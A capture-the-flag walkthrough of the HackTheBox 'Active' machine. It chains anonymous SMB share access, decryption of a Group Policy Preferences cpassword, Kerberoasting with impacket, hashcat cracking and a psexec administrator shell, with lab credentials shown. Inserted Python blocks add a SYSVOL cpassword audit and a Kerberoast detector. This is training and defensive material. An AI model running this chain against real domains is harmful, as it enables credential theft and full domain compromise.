Active HackTheBox WalkThrough

This is the Active HackTheBox machine walkthrough, the 26th machine in our OSCP-like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the Active HackTheBox machine. Before diving into the hacking part, a few things about this box: it is a Windows machine with IP address 10.10.10.100, rated easy by its maker.

Since this machine is retired, you will need a VIP subscription at hackthebox.eu to access it. First connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging its IP 10.10.10.100. If all goes well, start hacking.

As usual I started by scanning the machine. Scanning gives us an idea of how to proceed: it finds open and closed ports and tells us which services are running on them. I used Nmap for this task and the result is given below:

Scanning

$ sudo nmap -sC -sV -T3 -sT -oN Active.nmap 10.10.10.100

Nmap found many open ports. Among them, ports 53, 88, 135, 139, 389 and 445 are the ones worth enumerating, because we have tools for each of the services behind them. The dynamic ports (port numbers above 49151) are ignored because no registered service runs on them; only static ports carry registered services, so every well-known and registered port deserves a look during a security assessment. Port 53 runs DNS, 88 Kerberos, 135 Microsoft RPC, 139 and 445 SMB, and 389 LDAP.

The DNS service on port 53 revealed that the server operating system is Windows Server 2008 R2 SP1. Other services such as Kerberos and LDAP confirm that Active Directory is running on it.

SMB Enumeration

Since the SMB ports are open, we start by enumerating them: if anonymous login is allowed, we can learn about open shares and other useful things. Many SMB enumeration tools are available, such as $smbmap, $smbclient, $enum4linux and several Nmap scripts (see /usr/share/nmap/scripts/). I have used $smbmap for this task.

Anonymous login is allowed and we have READ permission on the Replication share. Let us download every file in this share and check what useful information we can gather from them.

$ smbmap -H 10.10.10.100
$ smbclient \\\\10.10.10.100\\Replication
smb:\> recurse ON
smb:\> prompt OFF
smb:\> mget *
smb:\> exit

We found a cpassword inside the Groups.xml file. This is where Windows Server 2008 and earlier stored user credentials set through Group Policy: when a new GPP (Group Policy Preference) is created, an associated XML file with the relevant configuration data is written to SYSVOL, and Microsoft encrypts the password with AES before storing it as cpassword. The AES key, however, is published in Microsoft's own documentation, which is why anyone who can read SYSVOL can recover the password; MS14-025 stopped Windows from writing new cpassword values but did not remove the ones already in SYSVOL.

$ cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

From this file we get the following useful information:

Domain Name: active.htb

UserName: SVC_TGS

cPassword: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
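As an added defensive example (not part of the original walkthrough), the following Python audit walks a copy of SYSVOL and reports every Group Policy Preference XML file that still carries a cpassword attribute, the leftover that MS14-025 does not clean up. It runs offline on a constructed Groups.xml sample; the sample cpassword value and the svc account names are placeholders, and the GUID path is the one seen in the walkthrough.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files known to carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample modelled on the Groups.xml layout; the cpassword is a placeholder.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="Q29uc3RydWN0ZWRTYW1wbGU" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""

def find_cpasswords(root):
    """One finding per element of a parsed GPP file that carries a cpassword."""
    hits = []
    for elem in root.iter():
        cpass = elem.get("cpassword")
        if cpass is None:
            continue
        # Groups.xml names the account in userName; other GPP types use accountName or runAs.
        account = elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "<unknown>"
        hits.append({"element": elem.tag, "account": account, "cpassword_length": len(cpass)})
    return hits

def audit_sysvol(sysvol_dir):
    """Walk a SYSVOL copy and collect every cpassword finding with its file path."""
    findings = []
    for dirpath, _, filenames in os.walk(sysvol_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed file: skipped here, inspect by hand
            for hit in find_cpasswords(root):
                hit["path"] = path
                findings.append(hit)
    return findings

def demo():
    """Build a throwaway SYSVOL-like tree holding the constructed sample and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return audit_sysvol(tmp)
```

Point audit_sysvol at a mounted or copied SYSVOL to list every policy that still ships a cpassword; each finding should be removed and the affected account's password rotated.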

Cracking GPP Password

Let us decrypt the cPassword using $gpp-decrypt (a tool built into Kali for exactly this purpose).

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
[Screenshot: decrypting the GPP password with gpp-decrypt (method 1)]

We can also use gpppfinder for this task. Let us decrypt the cPassword with gpppfinder.

$ sudo git clone https://bitbucket.org/grimhacker/gpppfinder.git
$ cd gpppfinder/ && ls
$ pip3 install -r requirements.txt
$ sudo chmod +x cli.py
$ sudo python3 cli.py -D edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
[Screenshot: decrypting the GPP password with gpppfinder (method 2)]

From the above we got the credential Active.htb\SVC_TGS: GPPstillStandingStrong2k18. If this were Windows Server 2012 or later, or if port 5985/5986 were open, I would try $evil-winrm to get a shell, but no Windows Remote Management port is open on this machine. If GPPstillStandingStrong2k18 were the administrator password I would try impacket's psexec.py to connect over SMB, but it is not an admin credential.

Active Directory Enumeration

We now have the credential of a domain user, Active.htb\SVC_TGS. Let us check what we can enumerate with it. Impacket's post-exploitation tool $impacket-GetADUsers revealed that the Active machine has 4 users.

Once we have a list of users, we can check which of them are kerberoastable. For more information on the Kerberoasting attack, check this pdf. $impacket-GetUserSPNs gave me a service ticket which can be cracked offline using $hashcat (an offline password cracker). This works because the service ticket is encrypted with the service account's own password hash, so any authenticated domain user can request it and then guess the password offline without ever locking the account out.

$ impacket-GetADUsers -all -dc-ip 10.10.10.100 active.htb/SVC_tgs:GPPstillStandingStrong2k18
$ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_tgs:GPPstillStandingStrong2k18
[Screenshot: Kerberoasting attack in Active Directory during the Active HackTheBox walkthrough]
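From the defender's side, the GetUserSPNs -request step above leaves a recognisable trail in Windows Security event 4769. The following Python detector, added here and not part of the original walkthrough, flags the pattern over a constructed sample of 4769 records: SVC_TGS is the account from the writeup, while the other account names, the svc_sql service and the client addresses are made up.

```python
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC, the etype GetUserSPNs asks for

# Constructed sample of Windows Security event 4769 (service ticket requested)
# records, reduced to the fields the detection needs. SVC_TGS is the account from
# the walkthrough; the other names and the client addresses are made up.
SAMPLE_4769 = [
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
]

def is_roastable_request(ev):
    """A 4769 record looks like a Kerberoast request when it is a successful,
    RC4-encrypted ticket for a user service account (not a machine account, not krbtgt)."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def kerberoast_alerts(events, min_services=2):
    """Group suspicious records by requester and client address and alert when one
    principal pulls RC4 tickets for at least min_services distinct service accounts,
    the pattern that bulk tools such as GetUserSPNs -request leave behind."""
    per_requester = {}
    for ev in events:
        if is_roastable_request(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            per_requester.setdefault(key, set()).add(ev["ServiceName"])
    alerts = []
    for (user, ip), services in per_requester.items():
        if len(services) >= min_services:
            alerts.append({"requester": user, "source": ip,
                           "services": ",".join(sorted(services))})
    return alerts
```

A single RC4 ticket for one service account is normal on a domain that still allows RC4; the alert fires on the volume and the etype together, and the real fix is long, random service account passwords with AES-only keys.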

Cracking Kerberos Ticket

Let us crack the password from the ticket using $hashcat.

$ hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
[Screenshot: cracking the Kerberos ticket with hashcat]
—Snip—
$ hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
[Screenshot: showing the cracked ticket password]

Hashcat found the password Ticketmaster1968, and this is the Administrator password. Since port 445 is open, let us use impacket's psexec module to get an admin shell.

Note: We can get a shell with psexec only if we have admin credentials, or if we are a user with write permission to the SMB shares. For more info about psexec check this article.

Getting Admin Shell

$ impacket-psexec administrator:Ticketmaster1968@10.10.10.100
[Screenshot: getting a root shell on the Active HackTheBox machine]

We have an admin shell. Let us capture the user and root flags.

Capture User Flag

$ type C:\Users\SVC_TGS\Desktop\user.txt
[Screenshot: capturing the user flag during the Active HackTheBox walkthrough]

Capture Root Flag

$ type C:\Users\Administrator\Desktop\root.txt
[Screenshot: capturing the root flag during the Active HackTheBox walkthrough]

This is how I rooted the Active HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/